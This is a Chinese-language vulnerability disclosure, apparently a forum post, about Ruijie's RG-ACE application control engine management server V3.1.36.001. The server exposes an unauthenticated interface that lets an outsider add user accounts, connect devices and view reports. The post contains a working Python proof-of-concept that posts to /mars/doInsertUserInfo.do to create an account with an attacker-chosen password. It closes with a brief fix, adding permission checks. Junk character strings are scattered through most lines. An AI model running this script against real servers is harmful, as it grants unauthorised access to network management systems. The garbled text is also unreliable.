锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低); b$ r4 s% H$ }4 Z. F% o% ~% ~
S6 ~9 ^& y" [" ]
/ M5 D* \$ l) H测试的具体版本是
/ w( n' `! k% r8 A* l) |产品名称: 锐捷应用控制引擎2 x4 G3 P# Z- G9 c* a
版本号: 3.1.36.001 TC
- M. d c( M* L; O编译时间: 201104291730
) s3 B% Y9 K% ?# q7 y' y e" r
- g5 s) ^' p2 Y2 C' |: w4 Y" f# E' B3 V: Q; A0 Y* B
漏洞证明:# ~9 C% @9 ] j* d
. f l' j; h$ ?' X, b
/ J* w5 i @& P+ W w0 z
J* W& h s2 U4 j% Q# F
* Y8 |5 v1 i. n, G7 H% ~ \1 p
3 v' }' @2 i# H H- B: U5 W% p" v0 _2 C) Z5 R
执行脚本. a1 n) r4 R& e3 R! G$ W! ~
#! /usr/bin/env python, i1 V. t$ b( D, b5 D" q4 O, b
#coding=gbk% c5 z, `7 r& z+ L7 J; z P& x& C+ z
#RG-ACE管理服务器 V3.1.36.001& L/ l) a- l9 s, @/ l- q7 X0 [
import urllib2, urllib,cookielib
' ~% y! X7 }2 I2 n# purl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
: A4 d: A2 f8 k" m- ] _opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))! O' {& r6 b; z0 t& v& f6 {
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
1 V* u3 _# V0 G2 ^# A' ^4 ~post=(("event","userManager.doInsertUserInfo"),( o# S/ c! Y. |% ~& _
("useractionname","addButtonValue"),3 U7 W: h% a& i3 l+ w
("useropermanager","userManager"),
, |# }8 i4 P4 `4 M. D("userName","t"), #######账号自己加
& l. r, }0 k- E. H9 c0 ^("pwd","aaaaaa"),######密码自己加
9 d+ ^9 n# X# C+ v% a5 x& m- s("trueName","ad"),
" g$ a& H) ]- X; z& I("email","")," [& H; W# i% T6 D4 V
("mobilePhone",""),
I u* b1 v5 ~. s) x6 E8 {( }("officePhone",""),. K* P& k. m+ e2 T& n8 h
("addr",""),
# k0 [) u5 X' l! O# X8 I("submit","确定"))7 |: r/ U2 A: D0 P, X
urllib2.install_opener(opener)
4 }/ I. B7 {9 m! j( ~p=urllib2.urlopen(url, urllib.urlencode(post)).read()
9 A% }+ ?" q6 Y& A& v% f/ K6 @print "Done"
7 ^$ L; L" w( D4 b+ p# i& X: w2 n) w; Z
登录,连接设备
$ w, [/ l9 }& n' ]; k
9 B* u; o$ R8 N' W6 @. m: Q5 F3 T
3 w$ @0 Y7 ?" e3 s" t0 M. U# T0 n8 J( \
# a( n4 N/ k+ ^! D, k2 t1 U. V1 e' y% K
* r% ^+ D, e. ?! K) @默认的管理员admin权限更大点
) \6 t/ g* q( p3 O6 L6 Z
- i' p# ]4 Q- x/ h/ P
" Z+ L+ T5 e: r/ c5 H# Z
) ^- _- m% t( T s# I q' B0 ? ; S; p- F1 j6 T2 h9 C: {8 q0 d0 a
( o1 X5 F7 R: ^% E: h
修复方案:. O2 j' ?4 ~7 r0 Z
加强对接口的权限验证
6 y; ?8 s+ y. E$ j) x) D" k, x9 j. A
|